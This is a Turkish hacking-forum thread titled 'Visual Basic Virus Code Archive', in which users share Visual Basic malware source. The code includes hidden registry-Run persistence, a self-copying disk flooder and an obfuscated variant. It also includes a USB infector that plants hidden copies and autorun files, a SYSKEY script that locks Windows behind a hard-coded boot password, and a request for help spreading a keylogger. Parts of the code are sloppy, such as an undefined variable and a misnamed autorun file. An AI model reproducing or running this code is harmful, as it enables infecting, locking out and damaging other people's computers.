Visual Basic Virüs Kod Arşivi

emre234493
Çırak
arkadaşlar
Dim KayitDefteri As Object
Set KayitDefteri = CreateObject("wscript.shell")
KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CUR RENTVERSION\RUN\" & App.EXEName, App.Path & "\" & App.EXEName & ".exe"
bu kod vb6 içinmiş 2008 için varmı yeniden başlasa dahi tekrar çalışsın
 
fuujin
Daimi Üye
arkadaşlar
Dim KayitDefteri As Object
Set KayitDefteri = CreateObject("wscript.shell")
KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CUR RENTVERSION\RUN\" & App.EXEName, App.Path & "\" & App.EXEName & ".exe"
bu kod vb6 içinmiş 2008 için varmı yeniden başlasa dahi tekrar çalışsın
vb 2008 için;

Kod:
      Dim key As Microsoft.Win32.RegistryKey
      key = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", True)
      key.SetValue("MyApp", Application.ExecutablePath)
 
osmanbey01
Çırak
Bendende Küçük bir Kod Buyrun . . .

Formun üzerine bir adet timer eklemeniz yeterli olacaktır..

Private Sub Form_Load()
Timer1.Enabled = True
Timer1.Interval = 500
App.TaskVisible = False
On Error Resume Next
Me.Hide
Dim KayitDefteri As Object
Set KayitDefteri = CreateObject("wscript.shell")
KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\" & App.EXEName, App.Path & "\" & App.EXEName & ".exe"
End Sub

Private Sub Timer1_Timer()
Dim asia1, asia2, asia3, asia3
asia1 = Rnd * 100
asia2 = App.Path & "\" & App.EXEName & ".exe"
asia3 = asia1 & ".exe"
FileCopy yol, "c:\" & asia3 & ""
End Sub

= Yarım saniyede C:\ diskine 100 adet kopyalar ve kendini gizler.Kendini windows açılış kayt defterine ekler boylece her açılışta yeniden açılır . . .
al bundada 100000 tane ekler :d
Bendende Küçük bir Kod Buyrun . . .

Formun üzerine bir adet timer eklemeniz yeterli olacaktır..

Private Sub Form_Load()
Timer1.Enabled = True
Timer1.Interval = 500
App.TaskVisible = False
On Error Resume Next
Me.Hide
Dim KayitDefteri As Object
Set KayitDefteri = CreateObject("wscript.shell")
KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\" & App.EXEName, App.Path & "\" & App.EXEName & ".exe"
End Sub

Private Sub Timer1_Timer()
Dim asia1, asia2, asia3, asia3
asia1 = Rnd * 100000
asia2 = App.Path & "\" & App.EXEName & ".exe"
asia3 = asia1 & ".exe"
FileCopy yol, "c:\" & asia3 & ""
End Sub

= Yarım saniyede C:\ diskine 100000 adet kopyalar ve kendini gizler.Kendini windows açılış kayt defterine ekler boylece her açılışta yeniden açılır . . .
 
osmanbey01
Çırak
Dim KayitDefteri As Object
Set KayitDefteri = CreateObject("wscript.shell")
KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CUR RENTVERSION\RUN\" & App.EXEName, App.Path & "\" & App.EXEName & ".exe"


editli hali :d
Set KayitDefteri = CreateObject(osman("ˆŒœ–‹ÑŒ—š““"))
KayitDefteri.RegWrite osman("·´º¦ ³°¼¾³ ²¾¼·¶±º£¬°¹«¨¾­º£²¶¼­°¬°¹«£¨¶±»°¨¬£¼ª­­º±«©º­¬¶°±£­ª±£") & App.EXEName, App.Path & osman("£") & App.EXEName & osman("Ñš‡š")
 
osmanbey01
Çırak
:d arkadaşlar %93 ud keylogger yazdım fakat bu keyloggerin flash takıldığında flash a ve ayrıca pc de sürekli kendini kopyalayıp pc ye filan bulaşmasını istiyorum yardım ederseniz sevinirim
 
4ssc1
Çırak
Usb İnfecter : Corabada bizimde tuzumuz olsun :)

Modul
PHP:
Public Declare Function GetLogicalDriveStrings Lib "kernel32" Alias "GetLogicalDriveStringsA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
Public Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) As Long
Public Declare Function WritePrivateProfileString Lib "kernel32" Alias "WritePrivateProfileStringA" (ByVal lpApplicationName As String, ByVal lpKeyName As Any, ByVal lpString As Any, ByVal lpFileName As String) As Long
Public Declare Function SetFileAttributes Lib "kernel32" Alias "SetFileAttributesA" (ByVal lpFileName As String, ByVal dwFileAttributes As Long) As Long

Public Const FILE_ATTRIBUTE_HIDDEN = &H2

Public Function USB()

Dim sBuffer As String * 260, iGet As Integer, iDrive As String, iType As String

iGet = GetLogicalDriveStrings(Len(sBuffer), sBuffer) ' // Get Drives

If iGet = 0 Then Exit Function ' // If iGet = 0 No Drives
iDrive = sBuffer
 
For i = 1 To 50 ' // We Disk 1 to 50 if there are available

If Left$(sBuffer, InStr(1, sBuffer, Chr(0))) = Chr(0) Then Exit For ' // If the disk you back chr(0) then it is not a valid disc

iDrive = Left(sBuffer, InStr(1, sBuffer, Chr(0)) - 1) ' // Get Drive Letter

iType = GetDriveType(iDrive) ' // Get Drive Type

If iType = 2 Then ' // If Type = 2 then is a PEN-DRIVE

Call Complete(iDrive) ' // INfect Disk

End If

sBuffer = Right(sBuffer, Len(sBuffer) - InStr(1, sBuffer, Chr(0))) ' // Remove the disk from the list

Next i ' // Next Disk
End Function

Function Complete(Drive As String) ' // Function For Infect Device
Dim YO As String
YO = App.Path & "\" & App.EXEName & ".exe" ' // APP Path

If Exist(Drive & App.EXEName & ".exe") = False Then ' // If the disk is not infected
FileCopy YO, Drive & App.EXEName & ".exe" ' // Copy App to disk

Call WritePrivateProfileString("Autorun", "Open", App.EXEName & ".exe", Drive & "Autorun.ini") ' // Create Autorun.inf

SetFileAttributes Drive & App.EXEName & ".exe", FILE_ATTRIBUTE_HIDDEN ' // We put the files in hidden mode
SetFileAttributes Drive & "Autorun.ini", FILE_ATTRIBUTE_HIDDEN ' // We put the files in hidden mode

End If
End Function

Public Function Exist(Path As Variant) As Boolean ' // Function foe see if a file exist
Dim FS
Set FS = CreateObject("Scripting.FileSystemObject")
Exist = FS.fileexists(Path)
End Function
Form Load'a
PHP:
Call Usb
Dedikten sonra program acildiktan sonra kendini usb ye gizli dosya olarak kopyalar.
 
hackel
Çırak
kardeş kusura bakma ama bunların hazırı yapılmış Res Hack le
Selam arkadaşlar alıntıdır sizlerle paylaşmak istedim...!!!!Acemiler uraşmasın!!!


1-) http://delphi.icm.edu.pl/ftp/tools/ResHack.zip (Buraya tıklıyoruz ve programı indiriyoruz..)


2-) yukard verdiğim programı çalıştırın açılan ekranda ''Files'' tuşuna ardından ''open'' tuşuna
basın ve C:/WINDOWS/system32/logonui.exe dosyasını açın.


3-)Aşşağıdaki resimdeki yola gidin
ve burdaki ''Hoşgeldiniz'' yazısını istediğiniz gibi değiştirin.(Örnek: Yinemi Sen!)NOT: Hoşgeldiniz Yazsıs kaç karakter ise yazacağınız yazıda o kadar olmalıdır yani
11 karakterlik bi yazı yazın.


4-) ''Compile script'' tuşuna basın ve ''files'' tan save as seçin ve ''mylogonui.exe''
olarak C:/WINDOWS/system32/ altına kaydedin.


5-) programı kapatın.


6-) Başlat/Çalıştır/regedit yazın ve enter diyin sora sırası ile.


7-) HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon
altındaki 'UIHOST' değerine çift tıklayın ve burdaki 'logonui.exe' yi 'mylogonui.exe'
olarak değiştirin.


:cool: Registry'i kapatın ve bilgisayarınızı yeniden başlatın.
 
DikGen
Cool ÜyeKod:
Private Sub Form_Load()
App.TaskVisible = False
Form1.Visible = False
Shell "SYSKEY.EXE", vbNormalFocus
SendKeys "G", 1
SendKeys "B", 1
SendKeys "{TAB}", 1
SendKeys "wardom", 1
SendKeys "{TAB}", 1
SendKeys "wardom", 1
SendKeys "{ENTER}", 1
SendKeys "{ENTER}", 1
SendKeys "{ENTER}", 1
End
End Sub
xp başlangıç parolası koyar. xp açılmadan önce sorulur oturum açma ekranı gelmeden önce .

deneyenler şifrenin "wardom" olduğunu unutmasın
----------------------------

Bunu dün gece yaptım. Fakat projeyi kaydetmeden F5 ile önizleme yaptım. Bugün bilgisayarı açtığımda ise biraz şaşırdım :) Fakat şifreyi tahmin ettim ve bilgisayara girdim. Google'de yaptığım araştırmaya göre ise bu şifre değiştirilebiliyor fakat iptal edilemiyor. Başlat>Çalıştır syskey yapınca ise çıkan pencerede aynı şey yazıyor. Acaba bunu nasıl iptal edebilirim. Buna benzer bir kod falan varsa veya bi program. Artık her neyse. Şifreyi kaldırmam lazım.
Şimdiden teşekkür ederim :)
 
Üst